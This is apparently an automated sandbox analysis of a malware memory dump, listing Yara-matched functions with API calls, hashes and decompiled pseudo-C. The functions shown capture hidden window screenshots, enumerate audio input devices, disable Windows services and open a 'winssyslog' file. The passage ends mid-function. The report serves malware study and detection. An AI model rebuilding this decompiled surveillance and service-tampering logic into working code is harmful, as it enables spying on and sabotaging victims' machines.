                                                                                    0x04eb9a39
                                                                                    0x00000000
                                                                                    0x04eb9a10
                                                                                    0x04eb9a10
                                                                                    0x04eb9a12
                                                                                    0x04eb9a14
                                                                                    0x04eb9a14
                                                                                    0x00000000
                                                                                    0x04eb9a10
                                                                                    0x04eb9a09

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6330: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04EC6356
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 04EB99E4
                                                                                    • Sleep.KERNEL32(00000064), ref: 04EB9A12
                                                                                    • Sleep.KERNEL32(00000064), ref: 04EB9A32
                                                                                    • TerminateThread.KERNEL32(?,000000FF), ref: 04EB9A51
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EB9A5F
                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 04EB9A6F
                                                                                    • CloseHandle.KERNEL32 ref: 04EB9A77
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseFileHandleSleep$AttributesDirectorySystemTerminateThreadUnmapView
                                                                                    • String ID: 0et$winssyslog
                                                                                    • API String ID: 3677296445-3892780803
                                                                                    • Opcode ID: 9cf74b29e1117b4effd3163d5eb57ff8454a3e49d785990aa19cb90ff9fa57c8
                                                                                    • Instruction ID: 5534afe4c9c5805832c4f97dc740719b26dbbe5e1c5df67207a34d2827dcf4ee
                                                                                    • Opcode Fuzzy Hash: 9cf74b29e1117b4effd3163d5eb57ff8454a3e49d785990aa19cb90ff9fa57c8
                                                                                    • Instruction Fuzzy Hash: 7D212B705012589FEB10AF24FC04F657BAAFB81314F448598D5D1C7282CB39BC65CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB76A0, Relevance: 15.1, APIs: 10, Instructions: 101windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowRect.USER32 ref: 04EB76D3
                                                                                    • CreateCompatibleDC.GDI32 ref: 04EB76DA
                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 04EB7713
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 04EB771E
                                                                                    • PrintWindow.USER32(00000000,00000000,00000000,?,?,?), ref: 04EB7735
                                                                                    • PrintWindow.USER32(00000000,00000000,00000002,?,?,?), ref: 04EB773B
                                                                                    • PrintWindow.USER32(00000000,00000000,00000000,?,?,?), ref: 04EB7745
                                                                                    • BitBlt.GDI32(?,?,?,00000000,?,00000000,00000000,00000000,00CC0020), ref: 04EB7792
                                                                                    • DeleteObject.GDI32(?), ref: 04EB77A2
                                                                                    • DeleteDC.GDI32(00000000), ref: 04EB77A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window$Print$CompatibleCreateDeleteObject$BitmapRectSelect
                                                                                    • String ID:
                                                                                    • API String ID: 718922780-0
                                                                                    • Opcode ID: 468ac7fce85c1d268f1902ec167def2d9061d0c6b5ca1441a7b4624399e8d75f
                                                                                    • Instruction ID: 54790dcf24373e68eb17680ff4c1990dc37e88196a5ba8f087e28e5e7cdd67e5
                                                                                    • Opcode Fuzzy Hash: 468ac7fce85c1d268f1902ec167def2d9061d0c6b5ca1441a7b4624399e8d75f
                                                                                    • Instruction Fuzzy Hash: D7313C71A00608AFDB02DBB5DC58AAEBBBCEF89351F104225F805F3144EB34A9818A60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC3930, Relevance: 15.1, APIs: 10, Instructions: 90servicesleepCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 91%
                                                                                    			E04EC3930(void* __ebx, short* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v32;
				struct _SERVICE_STATUS _v36;
				int _v40;
				signed int _t10;
				void* _t28;
				void* _t36;
				short* _t38;
				void* _t39;
				void* _t40;
				signed int _t41;

				_t10 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t10 ^ _t41;
				_t38 = __ecx;
				_v40 = 0;
				_t28 = OpenSCManagerW(0, 0, 0xf003f);
				if(_t28 == 0) {
					return E04ED572E(_v8 ^ _t41);
				} else {
					_t36 = OpenServiceW(_t28, _t38, 0xf01ff);
					if(_t36 != 0) {
						_t39 = 0;
						do {
							if(QueryServiceStatus(_t36,  &_v36) == 0) {
								goto L6;
							} else {
								if(_v32 == 1) {
									_t40 = LockServiceDatabase(_t28);
									if(_t40 != 0) {
										_v40 = ChangeServiceConfigW(_t36, 0xffffffff, 4, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
										UnlockServiceDatabase(_t40);
									}
								} else {
									ControlService(_t36, 1,  &_v36);
									Sleep(0x1f4);
									goto L6;
								}
							}
							L10:
							CloseServiceHandle(_t36);
							goto L11;
							L6:
							_t39 = _t39 + 0x1f4;
						} while (_t39 < 0x1388);
						goto L10;
					}
					L11:
					CloseServiceHandle(_t28);
					return E04ED572E(_v8 ^ _t41);
				}
			}














                                                                                    0x04ec3936
                                                                                    0x04ec393d
                                                                                    0x04ec3945
                                                                                    0x04ec394e
                                                                                    0x04ec3957
                                                                                    0x04ec395b
                                                                                    0x04ec3a19
                                                                                    0x04ec3961
                                                                                    0x04ec396e
                                                                                    0x04ec3972
                                                                                    0x04ec3974
                                                                                    0x04ec3976
                                                                                    0x04ec3983
                                                                                    0x00000000
                                                                                    0x04ec3985
                                                                                    0x04ec3989
                                                                                    0x04ec39ba
                                                                                    0x04ec39be
                                                                                    0x04ec39dc
                                                                                    0x04ec39df
                                                                                    0x04ec39df
                                                                                    0x04ec398b
                                                                                    0x04ec3992
                                                                                    0x04ec399d
                                                                                    0x00000000
                                                                                    0x04ec399d
                                                                                    0x04ec3989
                                                                                    0x04ec39e5
                                                                                    0x04ec39e6
                                                                                    0x00000000
                                                                                    0x04ec39a3
                                                                                    0x04ec39a3
                                                                                    0x04ec39a9
                                                                                    0x00000000
                                                                                    0x04ec39b1
                                                                                    0x04ec39ec
                                                                                    0x04ec39ed
                                                                                    0x04ec3a06
                                                                                    0x04ec3a06

                                                                                    APIs
                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04EC3951
                                                                                    • OpenServiceW.ADVAPI32(00000000,?,000F01FF), ref: 04EC3968
                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?,?,000F01FF), ref: 04EC397B
                                                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,000F01FF), ref: 04EC3992
                                                                                    • Sleep.KERNEL32(000001F4,?,000F01FF), ref: 04EC399D
                                                                                    • LockServiceDatabase.ADVAPI32(00000000), ref: 04EC39B4
                                                                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000F01FF), ref: 04EC39D5
                                                                                    • UnlockServiceDatabase.ADVAPI32(00000000), ref: 04EC39DF
                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF), ref: 04EC39E6
                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,000F01FF), ref: 04EC39ED
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigControlLockManagerQuerySleepStatusUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 3671983395-0
                                                                                    • Opcode ID: 2ee261bd80f4434270077c917e34c50414b5ca093e66dfbfb4c0e1646cca3210
                                                                                    • Instruction ID: 9962b1e3cfe954c411d6474363f418eb87586aac76221a7056e7af69afbe0e7b
                                                                                    • Opcode Fuzzy Hash: 2ee261bd80f4434270077c917e34c50414b5ca093e66dfbfb4c0e1646cca3210
                                                                                    • Instruction Fuzzy Hash: 9C21CB31701214ABC7109BA69D489BEF7B8EFC5712F10426FFD06E2288DA79DC058760
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB75A0, Relevance: 15.1, APIs: 10, Instructions: 87windowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 91%
                                                                                    			E04EB75A0(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t18;
				struct HWND__* _t20;
				int _t29;
				void* _t36;
				intOrPtr* _t44;
				struct HWND__* _t47;
				signed int _t48;
				void* _t50;
				void* _t55;

				_t50 = (_t48 & 0xffffffc0) - 0x34;
				_t36 = __ecx;
				_t18 = CreateCompatibleBitmap( *(__ecx + 0x14),  *(__ecx + 0x3c),  *(__ecx + 0x40));
				 *(__ecx + 0x1c) = _t18;
				SelectObject( *(__ecx + 0x18), _t18);
				_t20 = GetTopWindow(0);
				if(_t20 == 0) {
					L12:
					GetDIBits( *(_t36 + 0x18),  *(_t36 + 0x1c), 0,  *(_t36 + 0x40),  *(_t36 + 0x10), _t36 + 0x38, 0);
					DeleteObject( *(_t36 + 0x1c));
					return  *(_t36 + 0x10);
				}
				_t47 = GetWindow(_t20, 1);
				if(_t47 == 0) {
					goto L12;
				}
				_t44 = _t36 + 0x20;
				do {
					if(IsWindowVisible(_t47) != 0) {
						_t55 =  *((intOrPtr*)(_t44 + 0x10)) - 6;
						if(_t55 > 0 || _t55 == 0 &&  *((intOrPtr*)(_t44 + 0x14)) >= 3) {
							_t29 = 1;
						} else {
							_t29 = 0;
						}
						asm("movsd xmm0, [edi+0x8]");
						asm("movsd [esp], xmm0");
						E04EB76A0(_t36, _t47,  *_t44, _t44, _t47,  *((intOrPtr*)(_t44 + 4)), _t29);
						_t50 = _t50 - 8 + 0x10;
						SetWindowLongA(_t47, 0xffffffec, GetWindowLongA(_t47, 0xffffffec) | 0x02000000);
						if( *((intOrPtr*)(_t44 + 0x10)) < 6) {
							E04EB77D0(_t47, _t44);
							_t50 = _t50 + 4;
						}
					}
					_t47 = GetWindow(_t47, 3);
				} while (_t47 != 0);
				goto L12;
			}















                                                                                    0x04eb75a6
                                                                                    0x04eb75ab
                                                                                    0x04eb75b7
                                                                                    0x04eb75c1
                                                                                    0x04eb75c4
                                                                                    0x04eb75cc
                                                                                    0x04eb75d4
                                                                                    0x04eb7669
                                                                                    0x04eb767d
                                                                                    0x04eb7686
                                                                                    0x04eb7695
                                                                                    0x04eb7695
                                                                                    0x04eb75e3
                                                                                    0x04eb75e7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb75ed
                                                                                    0x04eb75f0
                                                                                    0x04eb75f9
                                                                                    0x04eb75fe
                                                                                    0x04eb7601
                                                                                    0x04eb760f
                                                                                    0x04eb760b
                                                                                    0x04eb760b
                                                                                    0x04eb760b
                                                                                    0x04eb7614
                                                                                    0x04eb7620
                                                                                    0x04eb7629
                                                                                    0x04eb762e
                                                                                    0x04eb7643
                                                                                    0x04eb764d
                                                                                    0x04eb7652
                                                                                    0x04eb7657
                                                                                    0x04eb7657
                                                                                    0x04eb764d
                                                                                    0x04eb7663
                                                                                    0x04eb7665
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 04EB75B7
                                                                                    • SelectObject.GDI32(?,00000000), ref: 04EB75C4
                                                                                    • GetTopWindow.USER32(00000000), ref: 04EB75CC
                                                                                    • GetWindow.USER32(00000000,00000001), ref: 04EB75DD
                                                                                    • IsWindowVisible.USER32 ref: 04EB75F1
                                                                                    • GetWindowLongA.USER32 ref: 04EB7634
                                                                                    • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 04EB7643
                                                                                    • GetWindow.USER32(00000000,00000003), ref: 04EB765D
                                                                                    • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 04EB767D
                                                                                    • DeleteObject.GDI32(?), ref: 04EB7686
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window$LongObject$BitmapBitsCompatibleCreateDeleteSelectVisible
                                                                                    • String ID:
                                                                                    • API String ID: 358708372-0
                                                                                    • Opcode ID: cde6c1ce9a0d210d3e013d016c0c7d2f58377cbb895b34440c60b8b35e304ecb
                                                                                    • Instruction ID: 170995320b571fd95b81c1a7951055adcbe7b23cf959266ba6340900288219c4
                                                                                    • Opcode Fuzzy Hash: cde6c1ce9a0d210d3e013d016c0c7d2f58377cbb895b34440c60b8b35e304ecb
                                                                                    • Instruction Fuzzy Hash: DA21D271600611ABDB126F68DC48E9B7B69FF84312F000955FD42DA599E725ED20CBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EE84BC, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E04EE84BC(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x4ef7988) {
					E04EE8159(_t52);
					_t26 = _a4;
				}
				E04EE8159( *((intOrPtr*)(_t26 + 0x3c)));
				E04EE8159( *((intOrPtr*)(_a4 + 0x30)));
				E04EE8159( *((intOrPtr*)(_a4 + 0x34)));
				E04EE8159( *((intOrPtr*)(_a4 + 0x38)));
				E04EE8159( *((intOrPtr*)(_a4 + 0x28)));
				E04EE8159( *((intOrPtr*)(_a4 + 0x2c)));
				E04EE8159( *((intOrPtr*)(_a4 + 0x40)));
				E04EE8159( *((intOrPtr*)(_a4 + 0x44)));
				E04EE8159( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E04EE8382(5,  &_v8);
				_v8 =  &_a4;
				return E04EE83D2(4,  &_v8);
			}




                                                                                    0x04ee84c2
                                                                                    0x04ee84c5
                                                                                    0x04ee84cd
                                                                                    0x04ee84d0
                                                                                    0x04ee84d5
                                                                                    0x04ee84d8
                                                                                    0x04ee84dc
                                                                                    0x04ee84e7
                                                                                    0x04ee84f2
                                                                                    0x04ee84fd
                                                                                    0x04ee8508
                                                                                    0x04ee8513
                                                                                    0x04ee851e
                                                                                    0x04ee8529
                                                                                    0x04ee8537
                                                                                    0x04ee853f
                                                                                    0x04ee8548
                                                                                    0x04ee8550
                                                                                    0x04ee8564

                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 04EE84D0
                                                                                      • Part of subcall function 04EE8159: HeapFree.KERNEL32(00000000,00000000,?,04EE0EDA,00000001,00000001), ref: 04EE816F
                                                                                      • Part of subcall function 04EE8159: GetLastError.KERNEL32(3D21FB31,?,04EE0EDA,00000001,00000001), ref: 04EE8181
                                                                                    • _free.LIBCMT ref: 04EE84DC
                                                                                    • _free.LIBCMT ref: 04EE84E7
                                                                                    • _free.LIBCMT ref: 04EE84F2
                                                                                    • _free.LIBCMT ref: 04EE84FD
                                                                                    • _free.LIBCMT ref: 04EE8508
                                                                                    • _free.LIBCMT ref: 04EE8513
                                                                                    • _free.LIBCMT ref: 04EE851E
                                                                                    • _free.LIBCMT ref: 04EE8529
                                                                                    • _free.LIBCMT ref: 04EE8537
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 58c059ad8b7848498c3d77b1050574b7a09343a11f93380d6b087ac180e1be24
                                                                                    • Instruction ID: 69e0a939ed73f49f519197d54be01ce29181c0f07a5545476236b91fcc1a0a0a
                                                                                    • Opcode Fuzzy Hash: 58c059ad8b7848498c3d77b1050574b7a09343a11f93380d6b087ac180e1be24
                                                                                    • Instruction Fuzzy Hash: 2811B676100508FFEB01FF96EC41DED3BA5FF04254B4165A6BA189F221DA32FA509B81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB1F95, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 173synchronizationsleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04EB2027
                                                                                    • waveInGetNumDevs.WINMM ref: 04EB2032
                                                                                      • Part of subcall function 04EB1190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74E5F5E0,?,04EB205E), ref: 04EB11A9
                                                                                      • Part of subcall function 04EB1190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74E5F5E0,?,04EB205E), ref: 04EB11B6
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000001,0000003F), ref: 04EB2082
                                                                                    • Sleep.KERNEL32(00000096), ref: 04EB208D
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04EB20A9
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EB20CE
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EB20D7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateEvent$ObjectSingleWait$CloseDevsHandleSleepwave
                                                                                    • String ID: |
                                                                                    • API String ID: 1906678132-2343686810
                                                                                    • Opcode ID: 2e95787efe0fb0cb7d0cd9361e64a4ac5000945ff27d839ed0dddb80f0770082
                                                                                    • Instruction ID: 916d89396377101e94a747842d9c54be8bba6be96c446c3d4b0c2d287392bd49
                                                                                    • Opcode Fuzzy Hash: 2e95787efe0fb0cb7d0cd9361e64a4ac5000945ff27d839ed0dddb80f0770082
                                                                                    • Instruction Fuzzy Hash: 0E31A571A40304BFFB109FA4DC85FAA7FA4EF04714F104159FA54AE2C5D6B5AA50CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EF0293, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,04EEFC6F), ref: 04EF02B6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DecodePointer
                                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                    • API String ID: 3527080286-3064271455
                                                                                    • Opcode ID: 8922a99e786f4138ddd696629fc63ee809f7ac803166490ab9df183f3760db0f
                                                                                    • Instruction ID: 2b71296d47f3222d8646496f68f58a99f32740a824ec6c5c9c6309158177e9c0
                                                                                    • Opcode Fuzzy Hash: 8922a99e786f4138ddd696629fc63ee809f7ac803166490ab9df183f3760db0f
                                                                                    • Instruction Fuzzy Hash: D9519B70A0150DCBDF10CFA8EE485FDBBB0FF48318F1021A4E685AA656DB35BA24CB15
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBAF90, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 142sleepmemorysynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 55%
                                                                                    			E04EBAF90(intOrPtr* __ecx, signed int _a4, char _a5) {
				intOrPtr* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t34;
				signed int* _t35;
				signed int* _t41;
				signed int _t43;
				signed int* _t44;
				signed char _t47;
				signed int* _t57;
				intOrPtr* _t63;
				void* _t65;
				intOrPtr* _t67;
				signed char _t71;
				signed char _t72;
				signed int _t74;
				intOrPtr* _t75;
				signed int* _t80;
				void* _t83;
				void* _t85;
				void* _t88;
				intOrPtr _t89;
				signed int _t91;
				void* _t94;
				void* _t101;

				_t67 = __ecx;
				_push(__ecx);
				_t33 = _a4;
				_push(_t88);
				_t63 = __ecx;
				 *__ecx = 0x4efd8b0;
				 *((intOrPtr*)(__ecx + 4)) = _t33;
				_v8 = __ecx;
				 *((intOrPtr*)(_t33 + 0x38)) = __ecx;
				_t34 = CreateEventW(0, 1, 0, 0);
				_t83 = Sleep;
				 *(_t63 + 8) = _t34;
				_t35 =  *0x4f06adc; // 0x0
				 *_t63 = 0x4efd8a0;
				if(_t35 != 0) {
					L5:
					_push(_t67);
					_push(0x3f);
					_a5 = _t35[0x83];
					_push(2);
					_push( &_a4);
					_a4 = 0x7e;
					E04EB1C60( *((intOrPtr*)(_t63 + 4)));
					WaitForSingleObject( *(_t63 + 8), 0xffffffff);
					Sleep(0x96);
					E04EBB6B0(_t63, _t63, _t83, _t88, _t98);
					_t41 =  *0x4f06adc; // 0x0
					_a4 =  *_t41;
					while(1) {
						_t89 =  *((intOrPtr*)(_t63 + 4));
						_t43 =  *(_t89 + 0x5c) & 0x0000ffff;
						if(_t43 != 1) {
							goto L10;
						}
						_t75 =  *((intOrPtr*)(_t89 + 0x20));
						if(_t75 == 0) {
							goto L10;
						} else {
							_t101 =  *((intOrPtr*)( *_t75 + 0x40))();
							L14:
							if(_t101 != 0) {
								_t80 =  *0x4f06adc; // 0x0
								_t91 = _a4;
								_t74 =  *_t80;
								if(_t74 != _t91) {
									_t50 =  <  ? _t74 : _t74 - _t91;
									_t85 = ( <  ? _t74 : _t74 - _t91) + ( <  ? _t74 : _t74 - _t91);
									_t23 = _t85 + 1; // 0x74e06491
									_t65 = LocalAlloc(0x40, _t23);
									_t26 = _t65 + 1; // 0x1
									 *_t65 = 0x7f;
									E04EDDC90(_t26,  &(_t80[0x105]) + _t91 * 2, _t85);
									_t28 = _t85 + 1; // 0x74e06491
									_t94 = _t94 + 8;
									_push(0x3f);
									_push(_t65);
									E04EB1C60( *((intOrPtr*)(_v8 + 4)));
									LocalFree(_t65);
									_t57 =  *0x4f06adc; // 0x0
									_t63 = _v8;
									_a4 =  *_t57;
								}
								Sleep(0x12c);
								continue;
							}
						}
						L18:
						_t44 =  *0x4f06adc; // 0x0
						__eflags = _t44[0x83];
						_t71 =  ==  ? 0 :  *0x4f068c9 & 0x000000ff;
						__eflags = _t71;
						 *0x4f068c9 = _t71;
						return _t63;
						goto L19;
						L10:
						__eflags = _t43 - 2;
						if(_t43 == 2) {
							_t72 =  *(_t89 + 0x24);
							__eflags = _t72;
							if(_t72 != 0) {
								_t47 =  *((intOrPtr*)( *((intOrPtr*)(_t72 + 4)) + 0x40))();
								__eflags = _t47;
								if(_t47 != 0) {
									__eflags =  *(_t89 + 0x48);
									goto L14;
								}
							}
						}
						goto L18;
					}
				} else {
					 *0x4f068c9 = 1;
					_t88 = 0;
					asm("o16 nop [eax+eax]");
					while(_t35 == 0) {
						Sleep(0x64);
						if(_t88 == 0x63) {
							 *0x4f068c9 = 0;
							return _t63;
						} else {
							_t35 =  *0x4f06adc; // 0x0
							_t88 = _t88 + 1;
							_t98 = _t88 - 0x64;
							if(_t88 < 0x64) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L19;
					}
					goto L5;
				}
				L19:
			}






























                                                                                    0x04ebaf90
                                                                                    0x04ebaf93
                                                                                    0x04ebaf94
                                                                                    0x04ebaf98
                                                                                    0x04ebaf9a
                                                                                    0x04ebafa2
                                                                                    0x04ebafa8
                                                                                    0x04ebafad
                                                                                    0x04ebafb0
                                                                                    0x04ebafb3
                                                                                    0x04ebafb9
                                                                                    0x04ebafbf
                                                                                    0x04ebafc2
                                                                                    0x04ebafc7
                                                                                    0x04ebafcf
                                                                                    0x04ebaff8
                                                                                    0x04ebaffe
                                                                                    0x04ebb002
                                                                                    0x04ebb004
                                                                                    0x04ebb00a
                                                                                    0x04ebb00c
                                                                                    0x04ebb00d
                                                                                    0x04ebb011
                                                                                    0x04ebb01b
                                                                                    0x04ebb026
                                                                                    0x04ebb02a
                                                                                    0x04ebb02f
                                                                                    0x04ebb036
                                                                                    0x04ebb040
                                                                                    0x04ebb040
                                                                                    0x04ebb043
                                                                                    0x04ebb04a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebb04c
                                                                                    0x04ebb051
                                                                                    0x00000000
                                                                                    0x04ebb053
                                                                                    0x04ebb058
                                                                                    0x04ebb097
                                                                                    0x04ebb097
                                                                                    0x04ebb099
                                                                                    0x04ebb09f
                                                                                    0x04ebb0a2
                                                                                    0x04ebb0a6
                                                                                    0x04ebb0ae
                                                                                    0x04ebb0b7
                                                                                    0x04ebb0ba
                                                                                    0x04ebb0c9
                                                                                    0x04ebb0cd
                                                                                    0x04ebb0d0
                                                                                    0x04ebb0d4
                                                                                    0x04ebb0dc
                                                                                    0x04ebb0df
                                                                                    0x04ebb0e5
                                                                                    0x04ebb0e8
                                                                                    0x04ebb0e9
                                                                                    0x04ebb0ef
                                                                                    0x04ebb0f5
                                                                                    0x04ebb0fa
                                                                                    0x04ebb105
                                                                                    0x04ebb105
                                                                                    0x04ebb10d
                                                                                    0x00000000
                                                                                    0x04ebb10d
                                                                                    0x04ebb097
                                                                                    0x04ebb114
                                                                                    0x04ebb114
                                                                                    0x04ebb124
                                                                                    0x04ebb12d
                                                                                    0x04ebb12d
                                                                                    0x04ebb130
                                                                                    0x04ebb139
                                                                                    0x00000000
                                                                                    0x04ebb06e
                                                                                    0x04ebb06e
                                                                                    0x04ebb071
                                                                                    0x04ebb077
                                                                                    0x04ebb07a
                                                                                    0x04ebb07c
                                                                                    0x04ebb088
                                                                                    0x04ebb08b
                                                                                    0x04ebb08d
                                                                                    0x04ebb093
                                                                                    0x00000000
                                                                                    0x04ebb093
                                                                                    0x04ebb08d
                                                                                    0x04ebb07c
                                                                                    0x00000000
                                                                                    0x04ebb071
                                                                                    0x04ebafd1
                                                                                    0x04ebafd1
                                                                                    0x04ebafd8
                                                                                    0x04ebafda
                                                                                    0x04ebafe0
                                                                                    0x04ebafe6
                                                                                    0x04ebafeb
                                                                                    0x04ebb060
                                                                                    0x04ebb06b
                                                                                    0x04ebafed
                                                                                    0x04ebafed
                                                                                    0x04ebaff2
                                                                                    0x04ebaff3
                                                                                    0x04ebaff6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebaff6
                                                                                    0x00000000
                                                                                    0x04ebafeb
                                                                                    0x00000000
                                                                                    0x04ebafe0
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,04EB9B4C,?,Function_000568D8,00000000), ref: 04EBAFB3
                                                                                    • Sleep.KERNEL32(00000064,?,?,?,?,?,04EB9B4C,?,Function_000568D8,00000000), ref: 04EBAFE6
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000002,0000003F,?,?,?,?,?,?,04EB9B4C,?), ref: 04EBB01B
                                                                                    • Sleep.KERNEL32(00000096,?,?,?,?,?,?,04EB9B4C,?), ref: 04EBB026
                                                                                    • LocalAlloc.KERNEL32(00000040,74E06491,?,?,?,?,?,?,04EB9B4C,?), ref: 04EBB0C3
                                                                                    • LocalFree.KERNEL32(00000000,00000000,74E06491,0000003F), ref: 04EBB0EF
                                                                                    • Sleep.KERNEL32(0000012C,?,?,?,?,?,?,04EB9B4C,?), ref: 04EBB10D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Sleep$Local$AllocCreateEventFreeObjectSingleWait
                                                                                    • String ID: ~
                                                                                    • API String ID: 824083382-1707062198
                                                                                    • Opcode ID: 9930325bda0228d7c7069a62753e9e839639b985134bcb8e9feeee6ef7ec9554
                                                                                    • Instruction ID: 6416573a68a0315be12c66a89d01c6be8d8a98e7e344897ba7ad14d64c761e45
                                                                                    • Opcode Fuzzy Hash: 9930325bda0228d7c7069a62753e9e839639b985134bcb8e9feeee6ef7ec9554
                                                                                    • Instruction Fuzzy Hash: 5051C235700244AFEB24DF28D884BAABBE5FF49714F4481A8E946DF646C675FC50CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBB6B0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 118filememoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 44%
                                                                                    			E04EBB6B0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				short _v528;
				long _v532;
				void* _v536;
				intOrPtr _v540;
				void* _v544;
				signed int _t19;
				void* _t30;
				long _t41;
				void* _t56;
				void* _t58;
				void* _t59;
				void* _t61;
				long _t62;
				signed int _t65;

				_t19 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t19 ^ _t65;
				_v540 = __ecx;
				_push(0);
				_v532 = 0;
				E04EC6330(__ebx, L"winssyslog",  &_v528, __edi, __esi, 8);
				_t58 = CreateFileW( &_v528, 0x80000000, 1, 0, 3, 0x80, 0);
				_v544 = _t58;
				_t72 = _t58 - 0xffffffff;
				if(_t58 == 0xffffffff) {
					__eflags = _v8 ^ _t65;
					return E04ED572E(_v8 ^ _t65);
				} else {
					_push(__ebx);
					_push(__esi);
